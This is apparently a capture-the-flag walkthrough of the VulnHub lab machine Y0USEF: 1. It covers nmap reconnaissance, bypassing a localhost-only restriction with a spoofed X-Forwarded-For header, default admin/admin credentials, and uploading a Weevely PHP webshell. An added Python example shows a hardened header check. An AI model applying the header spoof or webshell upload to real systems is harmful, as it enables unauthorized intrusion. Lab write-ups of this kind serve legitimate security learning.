VulnHub Target Machine Practice (1)

XTTF, 2021-02-14

The target machine for this exercise is Y0USEF: 1, which has two flags.

First, find the target's IP address. An nmap scan shows that it is 192.168.0.104:

nmap -sP 192.168.0.0/24

Starting Nmap 7.91 ( https://nmap.org ) at 2021-02-14 11:27 CST
Nmap scan report for 192.168.0.1
Host is up (0.0097s latency).
Nmap scan report for 192.168.0.102
Host is up (0.040s latency).
Nmap scan report for 192.168.0.104
Host is up (0.00056s latency).
Nmap scan report for 192.168.0.109
Host is up (0.0017s latency).
Nmap done: 256 IP addresses (4 hosts up) scanned in 3.16 seconds

Probing the ports shows that 80 and 22 are open, and the scan also collects the component and version information:

nmap -v -A 192.168.0.104

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.13 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   1024 d8:e0:99:8c:76:f1:86:a3:ce:09:c8:19:a4:1d:c7:e1 (DSA)
|   2048 82:b0:20:bc:04:ea:3f:c2:cf:73:c3:d4:fa:b5:4b:47 (RSA)
|   256 03:4d:b0:70:4d:cf:5a:4a:87:c3:a5:ee:84:cc:aa:cc (ECDSA)
|_  256 64:cd:d0:af:6e:0d:20:13:01:96:3b:8d:16:3a:d6:1b (ED25519)
80/tcp open  http    Apache httpd 2.4.10 ((Ubuntu))
| http-methods:
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.10 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

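Opening port 80, the page displays "Sorry , the site is under construction soon, it run", so it looks like the directories need to be fuzzed.

Running a directory scan with ffuf turned up a 301. A gripe here: why design a directory name like this? The scan ran for a whole afternoon.

Visiting it shows that access is not permitted.

Capturing the request with burp shows that the XFF header is missing. Since access may be limited to the local machine only, add: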

X-Forwarded-For: 127.0.0.1

The request now returns 200. Use the simple-modify-headers plugin to add the header, visit the URL, and try admin/admin, which logs in to the system successfully.
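The "local access only" check above fails because X-Forwarded-For is set by the client. The following added example (not code from the target machine or from the original post) contrasts an assumed version of that check with one that trusts the header only when the TCP peer is a known reverse proxy; the proxy address 10.0.0.5, the function names and the sample requests are constructed for illustration.

```python
import ipaddress

# Assumption: the only reverse proxy that really sits in front of the app.
TRUSTED_PROXIES = {ipaddress.ip_address("10.0.0.5")}


def naive_is_local(peer_ip, headers):
    """Vulnerable pattern: believes whatever X-Forwarded-For the client sent."""
    claimed = headers.get("X-Forwarded-For", peer_ip).split(",")[0].strip()
    return claimed == "127.0.0.1"


def real_client_ip(peer_ip, headers, trusted=TRUSTED_PROXIES):
    """Return the address of the nearest hop that is not a trusted proxy."""
    ip = ipaddress.ip_address(peer_ip)
    if ip not in trusted:
        # Direct connection: the header is client-controlled, so ignore it.
        return ip
    # Walk the chain right to left; each trusted proxy appended the hop it saw.
    raw = headers.get("X-Forwarded-For", "")
    hops = [h.strip() for h in raw.split(",") if h.strip()]
    for hop in reversed(hops):
        try:
            ip = ipaddress.ip_address(hop)
        except ValueError:
            break  # malformed entry: keep the last address that was verified
        if ip not in trusted:
            return ip
    return ip


def hardened_is_local(peer_ip, headers):
    """Allow 'local only' pages solely for a verified loopback client."""
    return real_client_ip(peer_ip, headers).is_loopback


if __name__ == "__main__":
    spoofed = {"X-Forwarded-For": "127.0.0.1"}  # constructed sample request
    print(naive_is_local("192.168.0.109", spoofed))     # header is believed
    print(hardened_is_local("192.168.0.109", spoofed))  # header is ignored
```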


There is an upload function here. Use Weevely, the PHP webshell tool that ships with kali:

weevely generate xttf test.php

The webshell uploads successfully and gives a shell.


A user.txt file is found under the home directory:

www-data@yousef-VirtualBox:/home $ cat user.txt
c3NoIDogCnVzZXIgOiB5b3VzZWYgCnBhc3MgOiB5b3VzZWYxMjM=

This gives the ssh password.

Got the first flag.

Got the second flag.